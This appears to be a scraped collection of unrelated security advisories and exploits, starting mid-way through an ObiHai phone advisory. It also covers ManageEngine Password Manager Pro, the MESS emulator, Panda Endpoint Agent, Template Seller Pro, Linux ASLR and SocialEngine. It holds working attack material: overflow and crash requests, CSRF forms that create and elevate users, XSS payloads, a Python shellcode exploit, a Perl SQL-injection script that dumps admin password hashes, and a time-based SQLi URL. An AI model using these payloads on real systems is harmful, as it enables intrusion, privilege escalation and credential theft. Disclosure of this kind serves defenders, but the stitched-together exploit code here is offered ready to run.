thread, but it does not appear that there are saved link registers on the stack
for the devices under test.
python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80
(gdb) bt
#0 0x479dc440 in strcpy () from root/lib/libc.so.6
#1 0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>: strb r3, [r1, r2]
0x479dc444 <strcpy+20>: bne 0x479dc438 <strcpy+8>
0x479dc448 <strcpy+24>: bx lr
0x479dc44c <strcspn>: push {r4, r5, r6, lr}
0x479dc450 <strcspn+4>: ldrb r3, [r0]
(gdb) i r r1 r2
r1 0xb434df01 3023363841
r2 0xff 255
(gdb) p/x $r1+$r2
$1 = 0xb434e000
-------------------------------------------------
Obi-4. Buffer overflow in internal socket handler
-------------------------------------------------
Commands to be executed by realtime backend process `obid` are sent
via Unix domain sockets from obiapp.
In formatting the message for the Unix socket, a new string is constructed on
the stack. This string can overflow the static buffer, leading to control of
program flow. The only vectors leading to this code that were discovered during
the assessment were authenticated, however unauthenticated code paths may exist.
Note that the example command can be executed as the lower-privileged "user"
user.
GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]
(gdb)
#0 0x41414140 in ?? ()
#1 0x0006dc78 in ?? ()
---------------------------------
Obi-5. Cross-site request forgery
---------------------------------
All portions of the web interface appear to lack any protection against
Cross-Site Request Forgery. Combined with the command injection vector in
ObiPhone-3, this would allow a remote attacker to execute arbitrary shell
commands on the phone, provided the current browser session was logged-in to the
phone.
----------------------------------------------
Obi-6. Failure to implement RFC 2617 correctly
----------------------------------------------
RFC 2617 specifies HTTP digest authentication, but is not correctly implemented
on the ObiPhone. The HTTP digest authentication fails to comply in the
following ways:
- The URI is not validated
- The application does not verify that the nonce received is the one it sent
- The application does not verify that the nc value does not repeat or go
backwards
GET / HTTP/1.1
Host: foo
Authorization: Digest username="admin", realm="a", nonce="a", uri="/",
algorithm=MD5, response="309091eb609a937358a848ff817b231c",
opaque="", qop=auth,
nc=00000001, cnonce="a"
Connection: close
HTTP/1.1 200 OK
Server: OBi110
Cache-Control:must-revalidate, no-store, no-cache
Content-Type: text/html
Content-Length: 1108
Connection: close
Please note that the realm, nonce, cnonce, and nc values have all been chosen
and the response generated offline.
--------------------------------------------------------
Obi-7. Invalid pointer dereference due to invalid header
--------------------------------------------------------
Sending an invalid HTTP Authorization header, such as
"Authorization: foo", causes the program to attempt to read from an invalid
memory address, leading to a segmentation fault and reboot of the device. This
requires no authentication, only access to the network to which the device is
connected.
GET / HTTP/1.1
Host: foo
Authorization: foo
This causes the server to dereference the address 0xFFFFFFFF, presumably
returned as a -1 error code.
(gdb) bt
#0 0x479dc438 in strcpy () from root/lib/libc.so.6
#1 0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>: ldrb r3, [r1, #1]!
0x479dc43c <strcpy+12>: cmp r3, #0
0x479dc440 <strcpy+16>: strb r3, [r1, r2]
0x479dc444 <strcpy+20>: bne 0x479dc438 <strcpy+8>
0x479dc448 <strcpy+24>: bx lr
(gdb) i r r1
r1 0xffffffff 4294967295
----------------------------------------------------
Obi-8. Null pointer dereference due to malicious URL
----------------------------------------------------
If the /obihai-xml handler is requested without any trailing slash or component,
this leads to a null pointer dereference, crash, and subsequent reboot of the
phone. This requires no authentication, only access to the network to which the
device is connected.
GET /obihai-xml HTTP/1.1
Host: foo
(gdb) bt
#0 0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args:
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>: ldr r2, [r1], #4
0x479dc7f8 <strlen+8>: ands r3, r0, #3
0x479dc7fc <strlen+12>: rsb r0, r3, #0
0x479dc800 <strlen+16>: beq 0x479dc818 <strlen+40>
0x479dc804 <strlen+20>: orr r2, r2, #255 ; 0xff
(gdb) i r r1
r1 0x0 0
------------------------------------------------------
Obi-9. Denial of service due to invalid content-length
------------------------------------------------------
Content-Length headers of -1, -2, or -3 result in a crash and device reboot.
This does not appear exploitable to gain execution. Larger (more negative)
values return a page stating "Firmware Update Failed" though it does not appear
any attempt to update the firmware with the posted data occurred.
POST / HTTP/1.1
Host: foo
Content-Length: -1
Foo
This appears to write a constant value of 0 to an address controlled by the
Content-Length parameter, but since it appears to be relative to a freshly
mapped page of memory (perhaps via mmap() or malloc()), it does not appear this
can be used to gain control of the application.
(gdb) bt
#0 0x00138250 in HTTPD_msg_proc ()
#1 0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>: strb r1, [r3, r2]
0x138254 <HTTPD_msg_proc+400>: ldr r1, [r4, #24]
0x138258 <HTTPD_msg_proc+404>: ldr r0, [r4, #88] ; 0x58
0x13825c <HTTPD_msg_proc+408>: bl 0x135a98
0x138260 <HTTPD_msg_proc+412>: ldr r0, [r4, #88] ; 0x58
(gdb) i r r3 r2
r3 0xafcc7000 2949410816
r2 0xffffffff 4294967295
Mitigation
==========
Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.
Author
======
The issues were discovered by David Tomaschik of the Google Security Team.
Timeline
========
- 2016/05/12 - Reported to ObiHai
- 2016/05/12 - Findings Acknowledged by ObiHai
- 2016/05/20 - ObiHai reports working on patches for most issues
- 2016/06/?? - New Firmware posted to ObiHai Website
- 2016/08/18 - Public Disclosure
[Systems Affected]
Product : ManageEngine Password Manager Pro
Company : ZOHO Corp.
Build Number : 8.1 to 8.3 and probably earlier versions
Affected Versions : 8102 to 8302 and probably earlier versions
[Product Description]
Password Manager Pro is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises.
[Vulnerabilities]
Multiple vulnerabilities were identified within this application:
1- Stored XSS in /AddMail.ve
2- Privilege escalation in /EditUser.do
3- Business Login Bypass in /EditUser.do
4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
7- Password Bruteforce for resources accounts in
/jsp/xmlhttp/AjaxResponse.jsp
8- Cross-Site Request Forgery
[Advisory Timeline]
17/07/2015 - Discovery and vendor notification
17/07/2015 - ManageEngine responsed that they will notify their
development team
13/10/2015 - ManageEngine informed that they have fixed these issue
14/10/2015 - Fixed Password Manager Pro build version 8300 has been released
15/10/2015 - Test on Beta build version 8300 was performed and
confirm the fix of these issues 2, 4, 7 and part of issue 8
02/11/2015 - ManageEngine ask more time to fix the remaining issues
before making this public
29/12/2015 - ManageEngine contacted for an update - No reply
12/01/2016 - ManageEngine contacted for an update - No reply
08/02/2016 - ManageEngine contacted for an update - small update provided
12/02/2016 - Last communication from ManageEngine
04/04/2016 - Public Disclosure
[Patch Available]
Password Manager Pro Release 8.3 (8300) (Released on October, 2015)
fix issues #2, #4, #7 and partially #8
Password Manager Pro Release 8.3 (8303) (Released on December 2015)
fix issues #1, #3, #5 and #6
[Exploit]
There is an exploit available that takes advantage of the Privilege
Escalation vulnerability (Issue #2) and elevates a regular user to
SuperAdmin, and then downloads the passwords and files stored within
the application. The exploit code is available here
- https://github.com/s3bap3/pmp-exploit
[Description of Vulnerabilities]
(1) Stored XSS in /AddMail.ve.
This functionality is under the personal accounts stored in the
application. However, as the page is also vulnerable to CSRF, an html
form can be forged to create a personal account an exploit the XSS
vulnerability. The affected parameter is "password", and the POST
message to send is something like this
[PoC]
POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1
service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F
(2) Privilege escalation in /EditUser.do that allows to do 2 things.
a- Hijack user's sessions by changing their emails and accessing
the forgot password functionality.
The affected parameter is "EMAIL" from the /EditUser.do web page.
Any user (even PASSWORD USER's role) could send a craft POST method
like the one below in order to change the user email address, which is
being used to generate a new user password when the previous one was
forgotten. The only attribute that needs to be changed from one
request to another is the LOGINID, which is a sequence number that
represent the User numeric ID.
b- Escalate privileges by changing the user account status from
Password user to superadmin.
By forging a similar request it is possible to raise our own
privileged to become a privileged user. For example, the parameter
"ROLE" can be changed to "Password Auditor" "Password Administrator"
or even "Administrator " and become it. It is also possible to become
a superAdmin by changing the parameter "superAdmin" from false to
true. This will allow us to take control of the application and all
the passwords stored on it. In order to become superAdmin, the user
role needs to be Administrator. Both can be achieved by forging the
same request. In this scenario there are two parameters to be aware
of.
- USERID and LOGINID is the numeric account id to which the
superadmin attribute will be granted (could be obtained from the login
reply)
- USER is the username to which the superadmin attribute will be granted
[PoC]
POST /EditUser.do?SUBREQUEST=true HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------20780287114832
-----------------------------20780287114832
Content-Disposition: form-data; name="isloginusersa"
false
-----------------------------20780287114832
Content-Disposition: form-data; name="superadminscope"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="SERVERPORT"
7272
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="USERID"
4
-----------------------------20780287114832
Content-Disposition: form-data; name="LOGINID"
4
-----------------------------20780287114832
Content-Disposition: form-data; name="USER"
username
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDLANG"
en
-----------------------------20780287114832
Content-Disposition: form-data; name="EMAIL"
pwned@user.com
-----------------------------20780287114832
Content-Disposition: form-data; name="ROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="superAdmin"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="Rule"
Strong
-----------------------------20780287114832
Content-Disposition: form-data; name="DEPT"
-----------------------------20780287114832
Content-Disposition: form-data; name="LOCATION"
-----------------------------20780287114832
Content-Disposition: form-data; name="mobileaccess"
enable
-----------------------------20780287114832
Content-Disposition: form-data; name="UserCert"; filename=""
Content-Type: application/octet-stream
-----------------------------20780287114832
Content-Disposition: form-data; name="lang_code"
en
-----------------------------20780287114832--
(3) Business Login Bypass in /EditUser.do
The application allows only the creation of certain amount of
Administrator, based on the licences. However it is possible to create
more administrators. In order to exploit this go to the user
administration page, and edit a user id. Save the edition without
making any modification and intercept that POST message. Modify both
parameters, "OLDROLE" and "ROLE" with the role "Administrator", and
the user role will be changed to this one. Every user can be converted
to an administrator even if the license does not allow that much. The
application only check the amount of administrators when "ROLE" is
Administrator but "OLDROLE" is another one.
(4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
Every time a password for a user account or resource's user account
is being changed, a request is sent to this path in order to validate
the password against the password policy. Despite the fact the the
password is being sent in the URL (this means it could be logged in
any proxy or even in the browser), the policy against the password is
being evaluated could by changed by modifying the parameter "Rule"
from the value it currently has to "Low", in order to be evaluated
with a lower policy. For example:
[PoC]
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5
(5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
When an administrator creates a Password Reset Listener, another
administrator needs to approve it. The same happens when a Listener
needs to be suspended. However this could be bypassed by creating and
approving the listener by the same administrator. This could be
achieved by forging a GET request like the following. The only
parameter that needs to be changed is the "LISTENERID" which is a
sequence number that represents the Listener.
[PoC]
Listener Approval
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
Listener Suspension
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
(6) Resource's users enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
It is possible to enumerate resource's user accounts by forging a
GET request as follows. This URL allows, if a user has access, to
retrieve the account password. However if a user does not have access,
the error message changes if the user exists or not. The only
parameters that needs to be modified are "Resource" and "Account".
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin
The error messages identifies if the account exists for that resource.
Account exists: ____ACCESS___DENIED__
Resource/Account does not exists: FAILURE
(7) Password Bruteforce for resources accounts in /jsp/xmlhttp/AjaxResponse.jsp
It is possible to enumerate resource's user passwords by forging a
GET request as follows. This URL is used in order to validate a user
password against the password policy specified. By being able to
change the password policy it is possible to use the "Low" policy
which does not allow to reuse the password that is currently setup for
the user. If an error message that the password could not be reused
appears, that indicate that the password is the current password for
that account.
The only parameters that needs to be modified are "Password" and
"ACCID", and ensure that the password policy "Rule" parameter is set
to low.
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8
The error messages identifies if the password is correct or not
for every user account.
Password matches: "Password cannot be same as last 1 passwords"
Password does not match: "SUCCESS"
Account ID does not exists: "Error in validating password policy"
(8) Cross-Site Request Forgery
The application is vulnerable to Cross-Site Request Forgery, which
by sending specific POST messages it is possible create a user in the
system (1), elevate privileges for a user (2)(4), and store a XSS in
the user's personal passwords (3). Below are two PoC
[PoC]
User Creation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/AddUser.do"
enctype="multipart/form-data">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="hacker" name="fname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="lname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="user" type="hidden"><input
value="true" type="hidden">
<input value="same" name="rbutton" type="hidden"><input
value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="spassword" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="mail"
type="hidden"><input value="true" type="hidden">
<input value="Password User" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="false" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="" name="dept" type="hidden"><input
value="true" type="hidden">
<input value="false" name="location"
type="hidden"><input value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
enctype="multipart/form-data">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="OLDROLE"
type="hidden"><input value="true" type="hidden">
<input value="613" name="USERID" type="hidden"><input
value="true" type="hidden">
<input value="613" name="LOGINID" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="USER" type="hidden"><input
value="true" type="hidden">
<input value="en" name="OLDLANG" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="EMAIL"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="DEPT" type="hidden"><input
value="true" type="hidden">
<input value="" name="LOCATION" type="hidden"><input
value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Stored XSS
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="service" value="1" />
<input type="hidden" name="serviceurl" value="1" />
<input type="hidden" name="loginname" value="1" />
<input type="hidden" name="password" value="<!-- --
--><script>alert('XSS');</script><!-- -- -->" />
<input type="hidden" name="spassword" value="" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="Rule" value="Low" />
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="SKIP_PREF" value="true" />
<input type="hidden" name="Admin" value="hacker" />
<input type="hidden" name="FORWARDURL"
value="UserTabView.cc%3F" />
<input type="submit" value="Submit">
</form>
</body>
</html>
--
S3ba
@s3bap3
http://linkedin.com/in/s3bap3
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
jsacco@exploitpack.com
# Program affected: Multi Emulator Super System (MESS)
# Version: 0.154-3.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
#
# Program description: MESS is an emulator for various consoles and
computing systems, sharing a
# lot of codebase with the MAME project.
# Kali Linux 2.0 package: pool/non-free/m/mame/mess_0.154-3.1_i386.deb
# MD5sum: ae8650a6de842e6792ba83785ac0dbef
# Website: http://mamedev.org/
#
# gdb$ run -gamma $(python -c 'print "\x41"*4080')
# Starting program: /usr/games/mess -gamma $(python -c 'print "\x41"*4080')
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library
"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
#
# Program received signal SIGSEGV, Segmentation fault.
#
#
--------------------------------------------------------------------------[regs]
#
# EAX: 0x00000000 EBX: 0x72203B22 ECX: 0x00001024 EDX: 0xBFFFE094 o d
I t S z a p c
# ESI: 0x00001024 EDI: 0xBFFFE095 EBP: 0x00001024 ESP: 0xBFFFD038 EIP:
0x41414141
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
#
#
--------------------------------------------------------------------------[code]
#
# => 0x9684539: mov esi,DWORD PTR [ebx+0x48]
# 0x968453c: lea edi,[ebp+esi*1+0x0]
# 0x9684540: push edi
# 0x9684541: push ebx
# 0x9684542: call 0x96843b0
# 0x9684547: add esp,0x10
# 0x968454a: test al,al
# 0x968454c: je 0x96845ad
#
#
--------------------------------------------------------------------------------
#
# 0x41414141 in ?? ()
#
# gdb$ backtrace
#
# #1 0x41414141 in ?? ()
import os,subprocess
def run():
try:
print "# Mess Emulator Buffer Overflow by Juan Sacco"
print "# This exploit is for educational purposes only"
# JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*4084
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*12
eip = "\xd1\xf3\xff\xbf"
subprocess.call(["mess",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, Mess emulator not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit Mess 0.154-3.1 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
* CVE: CVE-2016-3943
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Endpoint Administration Agent < v7.50.00
* Fixed Version: Panda Endpoint Administration Agent v7.50.00
Description:
Panda Endpoint Administration Agent v7.30.2 allows a local attacker to elevate his privileges from any account type (Guest included) and execute code as SYSTEM, thus completely compromising the affected host.
Affected Products:
Any Panda Security For Business products for Windows using this Agent service are vulnerable.
Technical Details:
Upon installing some Panda Security for Business products for Windows, such as Panda Endpoint Protection/Plus, a service named as 'Panda Endpoint Administration Agent' is installed in the host. This service runs under the SYSTEM account. However, due to weak ACLs set to the installation directory ("C:\Program Files\Panda Security\WaAgent") of this application and its subdirectories, any user can modify or overwrite any executable module (dynamic link libraries and executables) installed in those directories.
Impact:
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
Disclosure Log:
Vendor Contacted: 12/01/2016
Public Disclosure: 05/04/2016
Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
Kyriakos Economou
Vulnerability Researcher
#!/usr/bin/perl -w
# # # # #
# Exploit Title: AlstraSoft Template Seller Pro v3.25e Script (buy.php)- Remote SQL Injection Vulnerability
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/template.htm
# Demo: http://blizsoft.com/templates/
# Version: 3.25e
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|----------------------------------------------------|\n";
print "| Template Seller Pro v3.25e Remote SQL Injector |\n";
print "| Author: Ihsan Sencan |\n";
print "| Author Web: http://ihsan.net |\n";
print "| Mail : ihsan[beygir]ihsan[nokta]net |\n";
print "| |\n";
print "| |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
$elicha="group_concat(user_name,char(58),user_password)";
$table="UserDB";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "buy.php?tempid=-1+union+select+1,2,3,".$elicha.",5,6,7,8+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n";
print "[+] Success !!\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html
CVE-2016-3672 - Unlimiting the stack not longer disables ASLR
Authors: Hector Marco & Ismael Ripoll
CVE: CVE-2016-3672
Dates: April 2016
Description
We have fixed an old and very known weakness in the Linux ASLR implementation.
Any user able to running 32-bit applications in a x86 machine can disable the ASLR by setting the RLIMIT_STACK resource to unlimited.
Following are the steps to test whether your system is vulnerable or not:
1) Create a dummy program which shows its memory map:
#include <stdio.h>
int main(int argc, const char *argv[])
{
char cmd[256];
sprintf(cmd, "cat /proc/%d/maps", getpid());
system(cmd);
return 0;
}
2) Compile it:
$ gcc show_maps.c -o show_maps # In a i386 machine
$ gcc show_maps.c -o show_maps -m32 # In a 64-bit machine
3) Run the application to check that ASLR is working
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
f75c4000-f7769000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75db000-f7780000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7557000-f76fc000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7595000-f773a000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7574000-f7719000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75af000-f7754000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7530000-f76d5000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7529000-f76ce000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75c2000-f7767000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75fe000-f77a3000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at random positions, so, the ASLR is working properly.
Now, we run the same test but setting the stack to unlimited:
$ ulimit -a | grep stack
stack size (kbytes, -s) 8192
$ ulimit -s unlimited
stack size (kbytes, -s) unlimited
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at the same position in all executions: the ASLR has been disabled.
This is a very old trick to disable ASLR, but unfortunately it was still present in current Linux systems.
Vulnerable packages
The weakness, IFAIK is present from the first version of current Linux GIT repository. The first version on this resposiroty is Linux-2.6.12-rc2 dated on April 2005.
Impact
An attacker capable of running 32-bit system applications in a x86 machine is able to disable the ASLR of any application, including sensitive applications such as setuid and setgid. Note that it is not a exploitable vulnerability by itself but a trick to disable the ASLR. This weakness can be use by an attacker when trying to exploit some other bug. Since the i386 is still very used, the number of systems and affected users could be extremely huge.
The wekaness
The issue arises because the ASLR Linux implementation does not randomize always the mmap base address when the stack size is set to unlimited. Concretely, on i386 and on X86_64 when emulating X86_32 in legacy mode, only the stack and the executable are randomized but not other mmapped files (libraries, vDSO, etc.). And depending in the Linux version, the executable is neither randomized.
The function to calculate the libraries position when the stack is set to unlimited is mmap_legacy_base():
static unsigned long mmap_legacy_base(void)
{
if (mmap_is_ia32())
return TASK_UNMAPPED_BASE;
else
return TASK_UNMAPPED_BASE + mmap_rnd();
}
The function doesn't add any random offset when the system is running in a native 32-bit system (i386) or a 32-bit emulated system (x86_32).
Exploit
To exploit this weakness, the attacker just need to set to unlimited the stack and then execute a 32-bit application. Obviously the idea is to execute (attack) privileged applications such as setuid/setgid.
FIX
We have created a patch to fix this issue:
diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
index 96bd1e2..389939f 100644
--- a/arch/x86/mm/mmap.c
+++ b/arch/x86/mm/mmap.c
@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd)
}
/*
- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64
- * does, but not when emulating X86_32
- */
-static unsigned long mmap_legacy_base(unsigned long rnd)
-{
- if (mmap_is_ia32())
- return TASK_UNMAPPED_BASE;
- else
- return TASK_UNMAPPED_BASE + rnd;
-}
-
-/*
* This function, called very early during the creation of a new
* process VM image, sets up which VM layout function to use:
*/
@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm)
if (current->flags & PF_RANDOMIZE)
random_factor = arch_mmap_rnd();
- mm->mmap_legacy_base = mmap_legacy_base(random_factor);
+ mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;
if (mmap_is_legacy()) {
mm->mmap_base = mm->mmap_legacy_base;
The patch enables randomization for the libraries, vDSO and mmap requests on i386 and in X86_32 in legacy mode. We already sent the patch to Linux mantainers and the issue will be not problem in incomming Linux versions: Enable full randomization on i386 and X86_32
Discussion
Although this vulnerability is not exploitable by itself, the truth is that the ASLR protection mechanism is useless on local attacks for i386 and x86_32 systems when the attackers are able to attack applications that they can lauch.
Hector Marco - http://hmarco.org
Advisory ID: HTB23286
Product: SocialEngine
Vendor: Webligo
Vulnerable Version(s): 4.8.9 and probably prior
Tested Version: 4.8.9
Advisory Publication: December 21, 2015 [without technical details]
Vendor Notification: December 21, 2015
Public Disclosure: April 6, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL-Injection vulnerability in a popular social networking software SocialEngine. The vulnerability can be exploited to gain access to potentially sensitive information in database and compromise the entire website.
The vulnerability exists due to insufficient filtration of input data passed via the "orderby" HTTP GET parameter to "/index.php" script. A remote unauthenticated attacker can modify present query and execute arbitrary SQL commands in application's database.
A simple exploit below uses time-based SQL injection technique to demonstrate existence of the vulnerability. The following HTTP request will make page render for 99 seconds, if MySQL server version is is equal "5":
http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29
-----------------------------------------------------------------------------------------------
Solution:
Update to SocialEngine 4.8.10
More Information:
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
